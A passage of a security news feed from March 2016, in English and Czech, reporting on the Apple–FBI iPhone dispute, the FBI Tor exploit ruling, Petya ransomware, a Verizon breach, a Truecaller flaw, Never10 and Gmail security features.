Aren't you?
With its goal to deploy Windows 10 on over 1 Billion devices worldwide, Microsoft is becoming more aggressive to convince Windows 7 and 8.1 users to upgrade to its newest operating system, and it is getting harder for users to prevent the OS being installed.
But if you're worried that this out of control Windows 10 upgrade process will force you into downloading an unwanted OS; I have an easier solution to block Windows 10 upgrade on your PCs.
A new free tool, dubbed Never10, provides the user a one-click solution to disable Windows 10 upgrade until the user explicitly gives permission to install Windows 10.
Never10 has been developed by Steve Gibson, the well-known software developer and founder of Gibson Research, which is why the tool is also known as "Gibson's Never10."
How to Disable Windows 10 Upgrade on Your PCs
Go to Gibson's Never10 official site and click on the Download.
Once downloaded, the program detects if the upgrade to Windows 10 is enabled or disabled on your system and then shows a pop-up. If enabled, Click 'Disable Win10 Upgrade' button.
You’ll again see a pop-up that now shows Windows 10 upgrade is disabled on your system, with two buttons to 'Enable Win10 Upgrade' and 'Exit.' Click on Exit button.
disable-windows10-upgrade
That's it, and you have successfully disabled Windows 10 Upgrade on your PC.
Here's the kicker:
The best part of this tool is that you don't have to install an application on your PC to do this. Gibson’s Never 10 is an executable. So you just need to run it, and it doesn’t install anything on your computer. You can delete it when you're done.
"The elegance of this 'Never 10' utility is that it does not install ANY software of its own. It simply and quickly performs the required system editing for its user," Gibson writes on his page about the new utility.
According to Gibson, Never10 will be a great help to inexperienced users while advanced users will likely appreciate the fact that no additional software is installed and will be able to refer their family and friends to this easy-to-use utility.
For more technical details on how this tool works, you can head on to this link.
Unlike other available Windows 10 blocker tools, Never10 blocks the Windows 10 upgrade, but at the same time, the tool allows you to start the update process in case you change your mind, according to Windows watcher Paul Thurrott.
However, the primary purpose of Gibson's Never10 is to prevent Windows 7 and Windows 8.1 operating system from being upgraded to Windows 10. As Gibson says:
"Many users of Windows 7 and 8.1 are happy with their current version of Windows and have no wish to upgrade to Windows 10."
"There are many reasons for this, but among them is the fact that Windows 10 has become quite controversial due to Microsoft's evolution of their Windows OS platform into a service which, among other things, aggressively monitors and reports on its users' activities."
Moreover, just a month ago, Microsoft was caught displaying unsolicited advertisements on its Windows 10 users' desktops.
These reasons are enough for many users to stay on their previous versions of the Windows operating system.


Jak jste se dostali do zabijákova iPhonu? Apple si posvítí na FBI u soudu

30.3.2016  Ochrany
Americký Federální úřad pro vyšetřování (FBI) se snažil několik posledních měsíců donutit u soudu společnost Apple, aby mu zpřístupnila data z iPhonu zabijáka ze San Bernardina. Jenže karta se nyní obrátila a spolupráci po FBI vyžaduje naopak americký počítačový gigant. Vedení firmy chce zjistit, jak se vyšetřovatelé do jablečného smartphonu dostali. A obrátit se kvůli tomu podnik hodlá údajně i na soud.
Chyba v Zemanově čínském plánu – Návštěvu čínského prezidenta a její význam pro ČR komentuje Thomas Kulidakis Čtěte zde >>
Chytrý telefon od společnosti Apple byl přitom nastaven tak, aby se automaticky smazal po zadání deseti nesprávných přístupových hesel. Okamžitě se tak začaly množit otazníky nad tím, jak se vyšetřovatelům podařilo do uzamčeného přístroje dostat.

A vrásky mají kvůli tomu především bezpečnostní experti společnosti Apple. Vše totiž nasvědčuje tomu, že se v operačním systému iOS ukrývá nějaká kritická bezpečnostní chyba, o které zatím nic nevědí ani vývojáři amerického počítačového gigantu. Ta by umožňovala nejen FBI, ale i počítačovým pirátům průnik do jablečných zařízení.

Pokud by to byla pravda, v ohrožení by byly desítky miliónů chytrých telefonů iPhone a počítačových tabletů iPad. Tedy nejen ti, kdo jsou podezřelí ze spáchání nějakých trestných činů, ale i obyčejní uživatelé. [celá zpráva]

Na řadu přijdou právníci
Podle serveru Los Angeles Times již advokáti společnosti Apple vytvářejí právní taktiku, jak vládu přimět, aby prozradila všechna specifika o tom, jak se FBI podařilo proniknout do zabijákova iPhonu. Získat všechny detaily chtějí klidně i s pomocí soudu.

Vedení Applu svůj postoj a zájem získat podrobnosti prostřednictvím soudu nicméně oficiálně nepotvrdilo. Je ale vcelku pravděpodobné, že americký počítačový gigant zatím nechce z taktických důvodů odkrýt karty připravovaného právního sporu.

Bezpečnostní konzultant společnosti AVG Justin Olsson upozornil, že v sázce je důvěra zákazníků v produkty Applu. „Tak či onak, Apple potřebuje zjistit podrobnosti. Bez detailů o případné zranitelnosti nebudou vývojáři schopni zajistit soukromí svých zařízení,“ uvedl pro server Los Angeles Times Olsson.

Spor se táhne už měsíce
Celý spor mezi FBI a Applem se rozhořel kvůli tomu, že se vyšetřovatelům z FBI nepodařilo dva měsíce dostat do uzamčeného iPhonu islámského radikála. Právě kvůli neúspěchu vyšetřovatelů soud společnosti Apple nařídil, aby tuto funkci vypnula. To však vedení amerického počítačového gigantu odmítlo s tím, že to technicky není možné.

Jedinou možností je vytvoření „zadních vrátek“ do operačního systému iOS, který využívají právě chytré telefony iPhone a počítačové tablety iPad. Šéf Applu Tim Cook to ale opakovaně odmítal kvůli obavám ze zneužití. Implementací takového nástroje do zmiňované mobilní platformy by totiž byla FBI schopna obejít zabezpečení prakticky jakéhokoliv iPhonu nebo iPadu v budoucnosti.

K datům se ale nakonec FBI stejně dostala, detaily ale tají.

Útok v San Bernardinu byl nejtragičtějším od teroristických útoků v zemi v září 2001. Zradikalizovaný muslim Syed Farook a jeho žena Tashfeen Maliková tam na počátku prosince zastřelili 14 lidí. Později byli zabiti při přestřelce s policií.


Data 1,5 milionu zákazníků ukradená Verizonu jsou na prodej

30.3.2016 Incidenty

Ve Verizon Enterprise Solutions při vší té péči o firemní zákazníky zřejmě trochu zapomněli dostatečně pečovat o vlastní sítě.
KrebsonSecurity upozorňuje, že se na uzavřeném fóru objevila nabídka na prodej databáze zákazníků Verizon Enterprise za 100 tisíc dolarů, případně po kusech, 10 tisíc dolarů za 100 tisíc záznamů.

Data jsou výsledkem úniku z informačních systémů B2B jednotky amerického telekomunikačního giganta Verizone, který řeší bezpečnost zákaznických systémů, prodává bezpečnostní řešení a který také každý rok vydává velmi zajímavou ročenku o únicích dat a narušeních systémů - viz Verizon’s annual Data Breach Investigations Report (DBIR).

Verizon Brianu Krebsovi potvrdil, že útočníci využili bezpečnostní chybu, která jim umožnila získat kontaktní informace zákazníků. To vše prostřednictvím portálu, který byl určen pro firemní zákazníky Verizonu. Podle společnosti se ale útočníci měli dostat pouze k základním informacím o zákaznících, nikoliv k podstatným datům, která by byla nějak výrazně nebezpečná.

Prodejce databáze ji nabízí dokonce i ve formátu pro databázový systém MongoDB, lze se tedy dost i domnívat, že ona bezpečnostní chyba je Verizonem tak trochu zlehčována. Vypadá to totiž na to, že se útočníkovi prostě podařilo pořídit přímo dump z databáze.

Jak konkrétně se účastníkům podařilo data získat, známo není. Verizon tvrdí, že už chybu napravil, ale detaily zatím neposkytl. Celé je to ještě pikantnější s ohledem na to, že to je například i Verizon, který v čerstvé studii ukazuje, jak se hackerům podařilo dostat do systémů pro úpravu vody a ovlivnit i to, jaké množství chemikálií je do vody uvolňováno (viz Hackers Modify Water Treatment Parameters by Accident) a v řadě dalších studií a analýz ukazuje velmi konkrétní informace o únicích a narušeních.


Microsoft built a special version of Windows 10 just for Chinese Government
30.3.2016 OS
China is very strict about censorship, which makes it difficult for companies to launch their products in the country. But companies like Microsoft are playing smartly to target the largest market in the world.
Microsoft has found a way to enter into the banned Chinese Market, but this time with official support for Chinese Government through a new custom and exclusive Windows 10 version for China.
It sounds like Microsoft has no issues like Apple, which strongly refused the court order to create a special ‘GovtOS’ version to help the Feds with unlocking iPhone.
Microsoft’s CEO for the Greater China region Ralph Haupter has confirmed that the company has built a Chinese government-approved version of Windows 10 OS that includes “more management and security controls” and less bloatware (pre-installed apps).
Specialized Windows 10 'Zhuangongban' for China
In a joint venture with a state-run technology and defense company, CETC (China Electronic Technology Group), Microsoft developed its specialized version of Windows 10 to comply with governmental standards.
The codename for the exclusive version of Windows 10 for China is called "Windows 10 Zhuangongban," which means "Specialized Class."
The customized version of Windows 10 would come with basic apps and additional integrated privacy standards which could be a trust gaining strategy by Microsoft among Chinese nationals.
The initial stern action of Chinese Government to ban Windows from the Chinese desks was the outcome of discontinued support of Windows XP officially by Microsoft. Moreover, the company enforced its XP user base to switch to Windows 8.
According to the survey of Net Applications, a US Based Analytics firm, it is reported that 51% of the Chinese users relies on Windows 7, whereas 32.9% users are still relying on the Windows XP, a discontinued product.
There had been made various efforts made by Chinese Government to build the counterpart of Windows XP called Neo-Kylin. But as the new player is in its infancy, it failed to grab the market attention as it lacked in the technical support.
As no other options left, Chinese Government finally convinced Microsoft to team up with a local technological company (CETC) to build a new OS, and Windows 10 Zhuangongban is the result of the same.
Microsoft's Target -- 1 Billion Windows 10
Microsoft’s goal to install its newest Windows 10 OS on one Billion devices worldwide is not possible without covering the largest market in the world.
Convincing Chinese Government to adopt its Windows 10, even if it is a customized version, is a great achievement for Microsoft, which would help the company reach its 1 Billion goal soon.
China, being the largest populated country in the world is a golden egg client for Microsoft to broaden the Windows 10 market base.
With the Windows 10 Zhuangongban OS, now let’s see: Which Nation would be the next target for Microsoft to play the same move in order to reach its goal? Will it be Germany or Russia??


FBI is fighting back against Judge's Order to reveal TOR Exploit Code
30.3.2016 Safety
Last month, the Federal Bureau of Investigation (FBI) was ordered to reveal the complete source code for the TOR exploit it used to hack visitors of the world’s largest dark web child pornography site, PlayPen.
Robert J. Bryan, the federal judge, ordered the FBI to hand over the TOR browser exploit code so that defence could better understand how the agency hacked over 1,000 computers and if the evidence gathered was covered under the scope of the warrant.
Now, the FBI is pushing back against the federal judge’s order.
On Monday, the Department of Justice (DOJ) and the FBI filed a sealed motion asking the judge to reconsider its ruling, saying revealing the exploit used to bypass the Tor Browser protections is not necessary for the defense and other cases.
In previous filings, the defence has argued that the offensive operation used in the case was "gross misconduct by government and law enforcement agencies," and that the Network Investigative Technique (NIT) conducted additional functions beyond the scope of the warrant.
The Network Investigative Technique or NIT is the FBI's terminology for a custom hacking tool designed to penetrate TOR users.
This particular case concerns Jay Michaud, one of the accused from Vancouver, Washington, who was arrested in last year after the FBI seized a dark web child sex abuse site and ran it from agency’s own servers for the duration of 13 days.
During this period, the FBI deployed an NIT tool against users who visited particular, child pornography threads, grabbing their real IP addresses among other details. This leads to the arrests of Michaud among others.
The malware expert, Vlad Tsyrklevich held by the defense to analyse the NIT, said that it received only the parts of the NIT to analyse, but not sections that would ensure that the identifier attached to the suspect's NIT-infection was unique.
"He is wrong," Special Agent Daniel Alfin writes. "Discovery of the 'exploit' would do nothing to help him determine if the government exceeded the scope of the warrant because it would explain how the NIT was deployed to Michaud's computer, not what it did once deployed."
In a separate case, the Tor Project has accused the FBI of paying Carnegie Mellon University (CMU) at least $1 Million to disclose the technique it had discovered that could help them unmask Tor users and reveal their IP addresses. Though, the FBI denies the claims.


Bitdefender Vaccine now supports also CTB-Locker, Locky, TeslaCrypt
30.3.2016 Virus

The prevention is better that the cure, users can immunize their PC against CTB-Locker, Locky and TeslaCrypt using Bitdefender Anti-ransomware vaccine.
Security experts from the Romanian security vendor Bitdefender have updated their anti-ransomware vaccine in order to protect machines from the latest versions of the CTB-Locker, Locky and TeslaCrypt ransomware.

According data recently published by Fortinet, top ransomware families are CryptoWall, Locky, and TeslaCrypt, while Cryptowall is predominant, Lock is rapidly spreading.

ransomware infections statistics

The Bitdefender Anti-Ransomware toolkit was developed by the company years ago to help victims of crypto-ransomware to prevent infections.

Some ransomware-decryptors tries to exploit encryption flaws in the ransomware implementation to decrypt files or use encryption keys discovered by law enforcement during their activity.

These conditions are not easy to match, so Bitdefender is promoting the prevention instead the cure by spreading its anti-ransomware vaccine.

Bitdefender Anti-Ransomware application

The most recent version, 1.0.11.26, includes detection for the latest variant of ransomware in the wild, including CTB-Locker, Locky and TeslaCrypt.

These three ransomware had a different evolution in the last weeks, Locky for example is rapidly spreading meanwhile a new strain of TeslaCrypt appeared in the wild, the version 4.0 with implements significant improvements.

We have no news regarding the CTB-Locker, in fact, there are no new infections in the wild.

“Bitdefender anti-malware researchers have released a new vaccine tool which can protect against known and possible future versions of the CTB-Locker, Locky and TeslaCrypt crypto ransomware families.” state the announcement published by BitDefender.

“The new tool is an outgrowth of the Cryptowall vaccine program, in a way.” Chief Security Strategist Catalin Cosoi explained. “We had been looking at ways to prevent this ransomware from encrypting files even on computers that were not protected by Bitdefender antivirus and we realized we could extend the idea.”

Download the Bitdefender Anti-ransomware vaccine from the company website.


Feds request Judge to review the order to reveal TOR Exploit Code
30.3.2016 Safety

FBI is fighting back against the federal judge’s order to reveal the Tor Exploit and with DoJ filed a sealed motion requesting the review of the ruling.
A few weeks ago, a judge has ordered the FBI to reveal the complete source code for the TOR exploit to defense lawyers in a child porn case.

In a case involving child pornography, the FBI was ruled by a judge to provide all the code used to hack the PC of suspects and detailed information related to the procedure they have followed to de-anonymize Tor users.

Colin Fieman, a federal public defender working on the case was asked by motherborard.vice.com if the code would include exploits to bypass security features, Fieman’s reply was that the code would bypass “everything.”

“The declaration from our code expert was quite specific and comprehensive, and the order encompasses everything he identified,” he told to MotherBoard.

Fieman is defending Jay Michaud, a Vancouver public schools administration worker arrested by the FBI right after the FBI closed a popular child pornography site called “Playpen” hosted in the dark web, and where a network investigative technique (NIT)—the agency’s term for a hacking tool.

According to court documents reviewed by Motherboard, the FBI had used the NIT to identify the suspects while surfing on the Tor network.

The FBI monitored a bulletin board hidden service launched in August 2014, named Playpen, mainly used for “the advertisement and distribution of child pornography.”

The FBI was able to harvest around 1300 IPs, and until the moment 137 people have been charged. The network investigative technique used by the FBI included computers in the UK, Chile and Greece.

The defence has argued that the investigation that leveraged on the NIT was “gross misconduct by government and law enforcement agencies,” and that the Tor Exploit conducted operations out of the warrant scope.

In January, a report published by the Washington Post confirmed that in the summer of 2013 Feds hacked the TorMail service by injecting the NIT code in the mail page in the attempt to track its users.

Last month the federal judge Robert J. Bryan ordered the FBI to hand over the TOR browser exploit code in order to allow the defence to understand how the law enforcement used it.

Now, the FBI is fighting back against the federal judge’s order and with the Department of Justice (DOJ) filed a sealed motion requesting the review of the ruling.

The FBI and the DoJ sustain that it is not necessary to reveal the details of the Tor exploit.

Tor Exploit Firefox Zero-day against Tor Anonymity

The security expert and exploit developer Vlad Tsyrklevich who analyzed the Tor Exploit for the defense explained that he received only a portion of the NIT code, but he argued to haven’t reviewed the portion of code that link NIT identifier with a specific suspect.

“He is wrong,” Special Agent Daniel Alfin writes. “Discovery of the ‘exploit’ would do nothing to help him determine if the government exceeded the scope of the warrant because it would explain how the NIT was deployed to Michaud’s computer, not what it did once deployed.”


FBI může znát chybu v iPhonu, o které neví ani Apple

29.3.2016 Ochrany
Americký Federální úřad pro vyšetřování (FBI) se v noci na úterý pochlubil, že se mu podařilo obejít zabezpečení iPhonu zabijáka ze San Bernardina. To je pro Apple velmi špatná zpráva. Vše totiž nasvědčuje tomu, že vyšetřovatelé znají nějakou kritickou bezpečnostní chybu operačního systému iOS, o které patrně nemají ještě informace ani vývojáři amerického počítačového gigantu.
Vyšetřovatelé už minulý týden v úterý informovali, že jsou pravděpodobně schopni iPhone Syeda Farooka odkódovat. [celá zpráva]

Přesně po týdnu zástupci FBI oznámili, že se jim k datům skutečně podařilo dostat. Jak to udělali, však zatím stále tají a nic nenasvědčuje tomu, že by v dohledné době svoji metodu široké veřejnosti prozradili.

Takovéto chyby mohou poskytnout úplný přístup k zařízením.
bezpečnostní konzultant Ross Schulman
Právě to ale může představovat poměrně velký problém. Jak uvedl bezpečnostní konzultant Ross Schulman pro server CNN, FBI totiž mohl objevit chybu v operačním systému iOS, který využívají právě chytré telefony iPhone a počítačové tablety iPad.

Stejným způsobem by se tak vyšetřovatelé byli schopní dostat i do dalších jablečných zařízení. „Z minulosti víme, že takovéto chyby mohou poskytnout úplný přístup k zařízením, na které se mnoho z nás spoléhá každý den,“ prohlásil Schulman.

Chyba může ohrožovat i další uživatele
Podle něj by tak měl Apple ve vlastním zájmu chtít zjistit, jak se FBI do zabijákova iPhonu dostal. Jen tak totiž budou jeho lidé schopni vyřešit případnou chybu a ochránit tak všechny ostatní uživatele.

Vyšetřovatelům pravděpodobně s prolomením zabezpečení iPhonu pomohla společnost Cellebrite se sídlem v Izraeli. Firma britské stanici BBC potvrdila, že s americkými vyšetřovateli spolupracuje, ale více nesdělila.

Na svých internetových stránkách nicméně Cellebrite prohlašuje, že jeden z jejich nástrojů umí dekódovat a extrahovat data z iPhonu 5C. [celá zpráva]

Dva měsíce neúspěšného snažení
FBI se snažil do uzamčeného iPhonu islámského radikála dostat celé dva měsíce. Útočník měl ale svůj iPhone nastavený tak, aby se po zadání deseti nesprávných přístupových hesel automaticky vymazal, s čímž si bezpečnostní experti z FBI původně nedokázali poradit.

Soud proto Applu v únoru nařídil, aby tuto funkci vypnula, což však není technicky možné. Proto vyšetřovatelé chtěli po americkém softwarovém gigantu vytvořit v operačním systému iOS „zadní vrátka“, což však vedení Applu odmítalo.

Šéf Applu Tim Cook tehdy upozorňoval na to, že implementací takového nástroje do zmiňované mobilní platformy by byla FBI schopna obejít zabezpečení prakticky jakéhokoliv iPhonu nebo iPadu v budoucnosti. A nehraje roli, zda by šlo o přístroj teroristy, nebo běžného občana.


Na nový vyděračský virus jsou antiviry krátké

29.3.2016 Viry
Internetem se začal jako lavina šířit nový vyděračský virus Petya, který dokáže zašifrovat data na pevném disku. Bezpečnostním expertům dělá vrásky na čele především proto, že je výrazně rychlejší než prakticky všichni jeho předchůdci. To může značně ztížit jeho odhalení, upozornil server PC World.
Útoky vyděračských virů jsou v posledních týdnech stále častější a mají prakticky vždy stejný scénář. Nezvaný návštěvník zašifruje uložená data na pevném disku. Útočníci se snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty. Ta byla údajně vyměřena za používání nelegálního softwaru apod.

Ani po zaplacení výkupného se uživatelé ke svým datům nedostali. Místo placení výkupného je totiž nutné virus z počítače odinstalovat a data rozšifrovat, což ale nemusí být vůbec jednoduché. A ve většině případů to dokonce nejde vůbec.

Důležitá je rychlost
V čem je tedy Petya tak výjimečná? Většina vyděračských virů potřebuje k zašifrování dat na pevném disku poměrně dost času, klidně i několik hodin. Během toho může jejich práci zachytit antivirový program a zablokovat je ještě dříve, než v počítači nadělají nějakou větší neplechu.

Právě proto funguje Petya trochu odlišným způsobem. Na disku nezašifruje všechna data, ale pouze tzv. MBR. Jde o hlavní spouštěcí záznam, díky kterému se v podstatě spouští celý operační systém. K zašifrovanému záznamu pak počítač nemá přístup a místo Windows spustí jen hlášku o nutnosti zaplatit výkupné.

Na zašifrování MBR nepotřebuje nový vyděračský virus několik hodin, stačí mu pouze pár vteřin. Antiviry tak prakticky nemají šanci škodlivý kód zachytit. Hned po prvním restartu je pak problém na světě.

Za odšifrování chtějí 10 000 Kč
Vyděrači navíc nejsou žádní troškaři, za odšifrování požadují jeden bitcoin, což představuje při aktuálním kurzu více než 10 000 korun. Znovu je ale nutné zdůraznit, že zmiňovanou částku by lidé v žádném případě platit neměli. Útočníci jen shrábnou peníze a zmizí.

Petya se šíří v současnosti především v USA a sousedním Německu prostřednictvím nevyžádaných e-mailů. Je ale více než pravděpodobné, že se v dohledné době objeví také v České republice.


Remotely Exploitable Bug in Truecaller Puts Over 100 Million Users at Risk
29.3.2016 Crime
Security researchers have discovered a remotely exploitable vulnerability in Called ID app "Truecaller" that could expose personal details of Millions of its users.
Truecaller is a popular service that claims to "search and identify any phone number," as well as helps users block incoming calls or SMSes from phone numbers categorized as spammers and telemarketers.
The service has mobile apps for Android, iOS, Windows, Symbian devices and BlackBerry phones.
The vulnerability, discovered by Cheetah Mobile Security Research Lab, affects Truecaller Android version of the app that has been downloaded more than 100 Million times.
The actual problem resides in the way Truecaller identify users in its systems.
While installation, Truecaller Android app asks users to enter their phone number, email address, and other personal details, which is verified by phone call or SMS message. After this, whenever users open the app, no login screen is ever shown again.
This is because Truecaller uses the device's IMEI to authenticate users, according to researchers.
"Anyone gaining the IMEI of a device will be able to get Truecaller users' personal information (including the phone number, home address, mail box, gender, etc.) and tamper app settings without users' consent, exposing them to malicious phishers," Cheetah Mobile wrote in a blog post.
Cheetah Mobile researchers told The Hacker News that they were able to retrieve personal data belonged to other users with the help of exploit code just by interacting with Truecaller's servers.
On a successful exploitation of this flaw, the attackers can:
Steal personal information like account name, gender, e-mail, profile pic, home address, and more.
Modify a user's application settings.
Disable spam blockers.
Add to a black list for users.
Delete a user's blacklist.
Cheetah Mobile informed Truecaller of this flaw, and the company updated their servers as well as released an upgraded version of its Android app on March 22 in order to prevent abuse exploiting this flaw.
Truecaller said in its blog post published Monday that the vulnerability did not compromise any of its user information.
If you haven’t, download the latest version of Truecaller for your Android devices from the Google Play Store Now!


5 Things Google has Done for Gmail Privacy and Security
29.3.2016 Security
Over the past few years, Google has increasingly improved the online security and protections of its Gmail users.
Besides two-factor authentication and HTTPS, Google has added new tools and features to Gmail that ensures users security and privacy, preventing cyber criminals and intelligence agencies to hack email accounts.
1. Enhanced State-Sponsored Attack Warnings
Enhanced State-Sponsored Attack Warnings
Apple vs. FBI case urged every company to beef up the security parameters to prevent their services from not just hackers but also the law enforcement.
Google for a while now has the capability to identify government-backed hackers, and notify potentially affected Gmail users so they can take action as soon as possible.
Google recently announced on its blog post that it will alert Gmail users about the possibility of any state-sponsored attack by showing them a full-page warning with instructions about how to stay safe — very hard to miss or neglect.
Meanwhile, the company revealed that over 1 Million Gmail accounts may have been targeted by government-backed hackers so far.
Although Google has warned Gmail users of state-sponsored attackers since 2012, the company neither disclosed the exact number nor explained how it knows of such hacking attacks.
However, Google said that it knows who the targets are – the list often includes "activists, journalists, and policy-makers taking bold stands around the world."
2. SMTP Strict Transport Security (SMTP STS)
SMTP Strict Transport Security (SMTP STS)
A new security feature dubbed "SMTP STS" has been on the bench of the Internet Engineering Task Force (IETF) to obtain a green signal.
This new email standard is developed in a joint effort by the engineers of top email services including Google, Microsoft, Yahoo!, Comcast, LinkedIn, and 1&1 Mail & Media Development.
SMTP STS has been designed to enhance the email security by preventing Man-in-the-Middle (MitM) and encryption downgrade attacks that have compromised past efforts like STARTTLS at making SMTP a more secure protocol.
SMTP Strict Transport Security (SMTP STS) runs on top of the STARTTLS feature to strengthen SMTP standard.
SMTP STS will check if recipient supports SMTP STS and has valid and up-to-date encryption certificate. If everything goes well, it allows your message to go through. Otherwise, it will stop the email from sending and will notify you of the reason.
3. End-to-End Encryption (via Chrome Extension Only)
Google announced the End-To-End encryption for its users almost two years ago, but still, the novel feature is yet to release.
The idea is to develop a browser extension that ensures its users Privacy by implementing the complex, yet secure PGP (Pretty Good Privacy) encryption in an attempt to fully encrypt messages that even Google can not read, nor anyone else other than the users exchanging the emails.
With this goal in mind, the browser extension will let users create their private and public encryption keys within their browsers. The public key will be uploaded to Google's servers, while the private key will be stored locally in the browser.
How the End-to-End Chrome Extension Works:
gmail-end-to-end-encryption
When a user sends an email to the other user with a PGP key, his or her browser will automatically download the other user's public key from the server and encrypt the content of the email.
However, the work is still in progress, and the company has not revealed that when it is planning to release the browser extension.
Although Google made the source code for its End-to-End Chrome extension open source via GitHub almost a year ago, so that researchers can review it, the stable version is yet to release.
For now, you can try an alternative method to send encrypted emails. We have written a step-by-step tutorial article on how to send end-to-end encrypted emails to others.
If difficult, you can try a Swiss-based, ProtonMail, a free, open source and end-to-end encrypted email service that offers the simplest and best way to maintain secure communications to keep user's personal data safe.
4. Gmail's Red Padlock Alert
gmail-red-padlock-alert
Previously there was no method to ensure whether the received email had been traversed via an encrypted channel or not, which could be subjected to scrambling or Man-in-the-Middle (MiTM) attacks.
But last month, Google introduced a security measure in Gmail service in the form of a small Red Padlock next to a sender's email address in an effort to highlight users if the message has been sent through an unencrypted channel.
If a Gmail user receives an email from other services that don't support TLS encryption, the feature gives warning by showing an open red lock next to the sender’s email address (as shown).
These unencrypted emails then went to spam, increasing Gmail security of its users.
5. Google Safe Browsing For A Quick Malware Check
Google Safe Browsing For A Quick Malware Check
One of Google's recent changes is the expansion of its 'Safe Browsing' notifications.
The malicious links spread via emails are an easy hit method to infect a large number of users after forcing them to visit malicious web pages controlled by hackers.
However, the Safe Browsing feature protects Gmail users by identifying potentially dangerous links in emails.
The automated agents in the mail scan the content of emails for spam and malware detection. And before opening the link, Gmail inspects the complete mail and prevents the user to open the malicious links in the main upon a quick scan.
The features that are being added by Google helps the privacy of Gmail users and stricken the email confidential policies.


FBI Has Successfully Unlocked Terrorist's iPhone Without Apple's Help
29.3.2016 Apple
End of Apple vs. FBI. At least for now, when the FBI has unlocked iPhone successfully.
Yes, you heard it right. The Federal Bureau of Investigation (FBI) has unlocked dead terrorist's iPhone 5C involved in the San Bernardino shooting without the help of Apple.
After weeks of arguments, the United States government is withdrawing its motion compelling Apple to build a backdoored version of its iOS that can help the agency unlock iPhone of San Bernardino gunman Syed Farook.
The Department of Justice (DOJ) says that FBI has successfully accessed iPhone's data with the help of an undisclosed alternative method and that it no longer needs Apple's assistance.
"The government has now successfully accessed the data stored on Farook's iPhone and therefore no longer requires the assistance of Apple," the attorneys wrote in a court filing Monday. "Accordingly, the government hereby requests that the Order Compelling Apple Inc to Assist Agents in Search dated February 16, 2016, be vacated."
Meanwhile, a DoJ spokeswoman said in a statement: "The FBI is currently reviewing the information on the phone, consistent with standard investigatory procedures."
Last week, the DoJ delayed its court hearing against Apple so it could try a possible method of unlocking iPhone for which they have hired an "outside party".
At the time, Apple said it did not know any way to gain iPhone's access but hoped that the Feds would share with them any information of loopholes that might come to light in the iPhone.
Although the technique the FBI used to crack the iPhone is not disclosed and likely will not be any time soon, several experts suspect it involved NAND Mirroring.
Nand Mirroring is a technique used to copy the contents of the phone's NAND memory chip and flash a fresh copy back onto the chip when the max number of attempts is exceeded.
With the discovery of the alternative method, the legal battle between the FBI and Apple seems to be over in this particular case, but it does not end the overall battle about privacy and security.
As Apple has issued a statement, saying the company is committed to continuing its fight for civil liberties and collective security and privacy.
The full statement (via Verge) from Apple reads:
From the beginning, we objected to the FBI's demand that Apple builds a backdoor into the iPhone because we believed it was wrong and would set a dangerous precedent. As a result of the government's dismissal, neither of these occurred. This case should never have been brought.
We will continue to help law enforcement with their investigations, as we have done all along, and we will continue to increase the security of our products as the threats and attacks on our data become more frequent and more sophisticated.
Apple believes deeply that people in the United States and around the world deserve data protection, security and privacy. Sacrificing one for the other only puts people and countries at greater risk.
This case raised issues which deserve a national conversation about our civil liberties, and our collective security and privacy. Apple remains committed to participating in that discussion.


FBI breaks into San Bernardino shooter’s iPhone
29.3.2016 Apple

The Department of Justice says the FBI has broken into the iPhone used by the San Bernardino shooter, it no longer needs the help of Apple.
The US Department of Justice (DoJ) announced it has broken into San Bernardino shooter‘s iPhone and it had accessed encrypted stored on the device.

After a long battle between Apple and the FBI, the DoJ now no longer needs the company to help unlock the iPhone 5C used by one of the San Bernardino terrorists.

The DoJ had originally sought to force Apple in providing a method to access data on the terrorist’ iPhone device, a couple of weeks ago DOJ released a brief filing that threatens to force Apple to hand over the iOS source code if it will not help the FBI in unlocking the San Bernardino shooter ’s iPhone.

Now the El Reg published a filing made Monday to the Central California District Court that confirms prosecutors have successfully extracted data from the iPhone.

“The government has now successfully accessed the data stored on Farook’s iPhone and therefore no longer requires the assistance from Apple Inc. mandated by the court’s order compelling Apple Inc. to assist agents in search, dated February 16, 2016,” reads the DoJ request.

San Bernardino shooter iphone

The DoJ hasn’t provided details on the procedure used to break into the San Bernardino shooter ‘s iPhone, nor revealed the name of the firm that supported the FBI in the operation.

Last week security experts speculated the involvement of the Israeli mobile security firm Cellebrite.

Despite the intense legal battle between Apple and FBI, security experts have always confirmed the existence of methods to unlock the iPhone devices.

Data could have been accessed with either hardware or software techniques, this means that in the future the FBI could use the same methods in other cases, as explained by the security expert Jonathan Ździarski.

If the method used in this case turns out to be a software method, from what I see of the OS, the method could work on newer devices too.

A law enforcement official, speaking to the CNN on condition of anonymity, explained it was “premature” to say whether this method works on other Apple devices. He added that the method used by law enforcement worked on this particular phone, an iPhone 5C running a version of iOS 9 software.

Snowden always declared that the US Government has the technology to crack the security measures implemented by Apple.

Snowden in a video call at Blueprint for a Great Democracy conference accused the FBI of lying defining its declaration as absurd, in reality, he used a more colorful expression.

“The FBI says Apple has the ‘exclusive technical means’ to unlock the phone,” said Snowden in video conference “Respectfully, that’s horse sh*t.”
Snowden opinion on Apple vs FBI case San Bernardino shooter

On the same day, Snowden shared via Twitter a link to an American Civil Liberties Union blog post titled “One of the FBI’s Major Claims in the iPhone Case Is Fraudulent,” which explains that the FBI has the ability to bypass iPhone protection mechanism.

The fact that the FBI was able to successfully crack the phone without Apple’s help demonstrates that tech giants need to improve their efforts to protect users’ privacy.


Petya, ransomware šifrující zaváděcí záznam disku MBR

29.3.2016 Viry
Petya, ransomware šifrující zaváděcí záznam disku MBRDnes, Milan Šurkala, aktualitaProtože zašifrování celého disku je velmi nákladná operace, nový ransomware Petay na to jde mnohem jednoduše. Zašifruje zaváděcí záznam MBR na pevném disku a ten se tak stane nečitelným. Útočníci pak vyžadují výkupné.
V dnešní době začínají být útoky ransomware (vyděračského softwaru) čím dál častější. Jde v podstatě o to, že škodlivý kód získaný obvykle otevřením nebezpečné přílohy e-mailu zašifruje celý pevný disk a pak po oběti vyžaduje výkupné za opětovné zpřístupnění dat. Nový ransomware Petya jde na věc trochu jinak. Místo celého disku zašifruje pouze jeho MBR, která říká, kde je jaký soubor. Efekt na napadený počítač je ale v podstatě stejný. Nelze vědět, kde jsou jaká data a ta jakoby ani neexistovala.

